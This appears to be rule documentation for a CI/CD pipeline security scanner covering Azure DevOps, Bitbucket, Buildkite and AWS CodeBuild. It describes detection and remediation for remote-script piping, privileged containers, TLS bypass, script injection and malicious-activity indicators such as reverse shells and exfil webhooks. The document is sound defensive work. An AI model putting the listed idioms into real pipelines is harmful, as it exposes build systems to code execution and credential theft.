Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in pipeline variables or task inputs can't be rotated on a fine-grained schedule. Prefer OIDC or vault-based credential injection for cross-cloud access.
Recommendation. Use workload identity federation or an Azure Key Vault task to inject short-lived AWS credentials at runtime. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from pipeline variables and task parameters.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-014 in the Azure DevOps provider.
ADO-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: ADO-016 in the Azure DevOps provider.
ADO-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build agent, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-017 in the Azure DevOps provider.
ADO-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: ADO-020 in the Azure DevOps provider.
ADO-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-023 in the Azure DevOps provider.
ADO-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. On Azure Pipelines the common pattern is a Bash@3 task invoking cosign attest --yes --predicate=provenance.json $(image). The native Microsoft SBOM tool emits _manifest/spdx_2.2/manifest.spdx.json for SBOM but does not produce provenance on its own.
Recommendation. Add a task that runs cosign attest against a provenance.intoto.jsonl statement, or Microsoft's sbom-tool in attestation mode. ADO-006 covers signing; this rule covers the in-toto statement SLSA Build L3 additionally requires.
Source: ADO-024 in the Azure DevOps provider.
ADO-025: Cross-repo template not pinned to commit SHA HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Azure Pipelines resolves template: build.yml@tools against the tools repo resource's ref: field. When that ref is refs/heads/main (or missing, which defaults to the pipeline's default branch), a push to the callee repo changes what your pipeline runs on the next invocation.
Recommendation. On every resources.repositories entry referenced from a template: ...@repo-alias directive, set ref: refs/tags/<sha> or the bare 40-char commit SHA, never a branch or floating tag. A moved branch/tag swaps the template body without changing your pipeline file.
Source: ADO-025 in the Azure DevOps provider.
ADO-026: Pipeline contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. ADO pipelines can run arbitrary shell via bash / script / powershell tasks. This rule scans every string value for known-bad patterns (reverse shells, base64-decoded execution, miner binaries, exfil channels). Orthogonal to ADO-016/ADO-017/ADO-023.
Recommendation. Treat as a potential compromise. Identify the PR/branch that added the matching task(s), rotate any Service Connections the pipeline can reach, and audit Pipeline run logs for outbound traffic to the matched hosts.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production pipeline still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: ADO-026 in the Azure DevOps provider.
ADO-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements ADO-002 (script injection from untrusted PR context). Fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value that must feed a dynamic command at the boundary.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: ADO-027 in the Azure DevOps provider.
BB-001: pipe: action not pinned to exact version HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.
Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-001 in the Bitbucket provider.
BB-002: Script injection via attacker-controllable context HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name can execute inline.
Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.
Source: BB-002 in the Bitbucket provider.
BB-003: Variables contain literal secret values CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.
Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
Source: BB-003 in the Bitbucket provider.
BB-004: Deploy step missing deployment: environment gate MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.
Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
Source: BB-004 in the Bitbucket provider.
BB-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Complements BB-003 (variable-name scan). BB-008 checks every string in the pipeline against the cross-provider credential-pattern catalog, catches secrets pasted into script bodies or environment blocks.
Recommendation. Rotate the exposed credential. Move the value to a Secured Repository or Deployment Variable and reference it by name.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: BB-008 in the Bitbucket provider.
BB-011: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values embedded in the pipeline file can't be rotated on a fine-grained schedule. Prefer OIDC or Bitbucket secured variables for cross-cloud access.
Recommendation. Use Bitbucket OIDC with oidc: true on the AWS pipe, or store credentials as secured Bitbucket variables rather than inline values. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the pipeline file.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-011 in the Bitbucket provider.
BB-012: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: BB-012 in the Bitbucket provider.
BB-013: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-013 in the Bitbucket provider.
BB-015: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: BB-015 in the Bitbucket provider.
BB-016: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered step writes to a well-known path; a subsequent deploy step on the same runner reads it. Detects runs-on: self.hosted without an ephemeral marker or Docker image override.
Recommendation. Use Docker-based self-hosted runners or configure runners to tear down between jobs. Add 'ephemeral' to runs-on labels or use Bitbucket's runner images that are rebuilt per-job.
Source: BB-016 in the Bitbucket provider.
BB-017: Repository token written to persistent storage CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detects patterns where Bitbucket pipeline tokens are redirected to files or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, artifacts, or cache entries.
Recommendation. Never write BITBUCKET_TOKEN or REPOSITORY_OAUTH_ACCESS_TOKEN to files or artifacts. Use the token inline in the command that needs it and let Bitbucket revoke it after the build.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-017 in the Bitbucket provider.
BB-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-023 in the Bitbucket provider.
BB-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Bitbucket has no native SLSA builder; self-hosted attestation via cosign attest or witness run is the usual path. Pipes like atlassian/cosign-attest (if published) would also match.
Recommendation. Add a step that runs cosign attest against a provenance.intoto.jsonl statement, or integrate the TestifySec witness run attestor. Artifact signing alone (BB-006) doesn't satisfy SLSA Build L3.
Source: BB-024 in the Bitbucket provider.
BB-025: Pipeline contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Specific indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands). Does not replace BB-014 (TLS bypass) or BB-013 (Docker insecure), those are hygiene; this is evidence.
Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any credentials referenced from the pipeline's variable groups, and audit recent builds.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production pipeline still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: BB-025 in the Bitbucket provider.
BB-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements BB-002 (script injection from untrusted PR context). This rule fires on intrinsically risky idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: BB-026 in the Bitbucket provider.
BK-001: Buildkite plugin not pinned to an exact version HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).
Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
Source: BK-001 in the Buildkite provider.
BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).
Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-002 in the Buildkite provider.
BK-003: Untrusted Buildkite variable interpolated in command HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).
Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
Source: BK-003 in the Buildkite provider.
BK-004: Remote script piped into shell interpreter HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.
Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-004 in the Buildkite provider.
BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).
Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-005 in the Buildkite provider.
BK-006: Step has no timeout_in_minutes LOW
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts, a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.
Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
Known false positives.
- Steps that genuinely need >24h (rare; database migrations, ML training jobs), set
timeout_in_minutes: 1440explicitly so the absence of a timeout is intentional.
Source: BK-006 in the Buildkite provider.
BK-007: Deploy step not gated by a manual block / input MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.
Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
Known false positives.
- Pipelines where the deploy gate lives in a triggered pipeline rather than the local file, the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op
block:to silence.
Source: BK-007 in the Buildkite provider.
BK-008: TLS verification disabled in step command MEDIUM 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative, partial-word matches (--insecure-protocols) are excluded.
Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-008 in the Buildkite provider.
BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Unsigned artifacts can't be verified downstream, a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.
Recommendation. Add a signing step, install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.
Source: BK-009 in the Buildkite provider.
BK-010: No SBOM generated for build artifacts MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog, syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.
Source: BK-010 in the Buildkite provider.
BK-011: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).
Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: BK-011 in the Buildkite provider.
BK-012: No vulnerability scanning step MEDIUM
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.
Recommendation. Add a vulnerability scanner, trivy fs . for source / filesystem, trivy image <ref> for container images, grype and snyk for either. Add npm audit / pip-audit for language-specific dep audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: BK-012 in the Buildkite provider.
BK-013: Deploy step has no branches: filter MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship-it, release, promote, rollout, helm upgrade, kubectl apply, terraform apply, aws ecs update-service, aws lambda update-function-code, gcloud run deploy). The check passes when the step declares branches: with at least one literal branch name (a wildcard like "*" is treated as an explicit opt-out, not a passing filter, and still trips). The pipeline-level default also counts, top-level steps: with branches: propagates.
Recommendation. Add branches: "main release/*" (or your release branch glob) to every deploy step. Buildkite skips the step on any other branch, which prevents a feature-branch PR from accidentally promoting code to production. Combine with BK-007's manual block: so a release branch plus a human approval is the path to deploy.
Known false positives.
- Trunk-based teams that branch-protect
mainand treat every merge as a deploy candidate may not usebranches:. Addbranches: mainto make the policy explicit, or ignore BK-013 in.pipeline-check-ignore.ymlwith a scope ofmain-only repos.
Source: BK-013 in the Buildkite provider.
CA-004: CodeArtifact repo policy grants codeartifact: with Resource '' HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. codeartifact:* on Resource: '*' collapses the entire repository's authority into one grant: the holder can read, write, delete, dispose, and re-publish every package. Even for a service principal that nominally only consumes packages, the grant lets a compromise of that consumer rewrite every dependency the team relies on.
Recommendation. Scope Allow statements to specific codeartifact: actions (e.g. codeartifact:ReadFromRepository) and to specific package-group ARNs. Wildcard action + wildcard resource is the classic over-broad grant that lets a consumer also publish.
Source: CA-004 in the AWS provider.
CB-001: Secrets in plaintext environment variables CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.
Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
Source: CB-001 in the AWS provider.
CB-002: Privileged mode enabled HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.
Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.
Source: CB-002 in the AWS provider.
CB-003: Build logging not enabled MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.
Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.
Source: CB-003 in the AWS provider.
CB-005: Outdated managed build image MEDIUM
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here, CB-009 handles the separate concern of tag vs digest pinning for custom images.
Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.
Known false positives.
- One version behind the current
aws/codebuild/standardis a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.
Source: CB-005 in the AWS provider.
CB-006: CodeBuild source auth uses long-lived token HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.
Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.
Source: CB-006 in the AWS provider.
CB-008: CodeBuild buildspec is inline (not sourced from a protected repo) HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. An inline buildspec (source.buildspec set to YAML text, or a S3 URL) bypasses the protections that cover your source code. A user with codebuild:UpdateProject can rewrite the build commands without touching the repository, no PR review, no branch protection, no audit of what changed. Store buildspec.yml in the repo instead.
Recommendation. Remove the inline buildspec and store buildspec.yml in the source repository under branch protection. Anyone with codebuild:UpdateProject can silently rewrite an inline buildspec; repository-sourced buildspecs inherit the repo's review and protection controls.
Source: CB-008 in the AWS provider.
CB-011: CodeBuild buildspec contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Scans the source.buildspec text on every CodeBuild project for concrete attack indicators: reverse shells, base64-decoded execution, miner binaries/pools, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands. CB-011 is CRITICAL by design, a true positive is evidence of compromise, not a hygiene improvement. Repo-sourced buildspecs (not inlined) return NOT APPLICABLE because the text isn't visible to the scanner; CB-008 already flags the inline form as a governance gap.
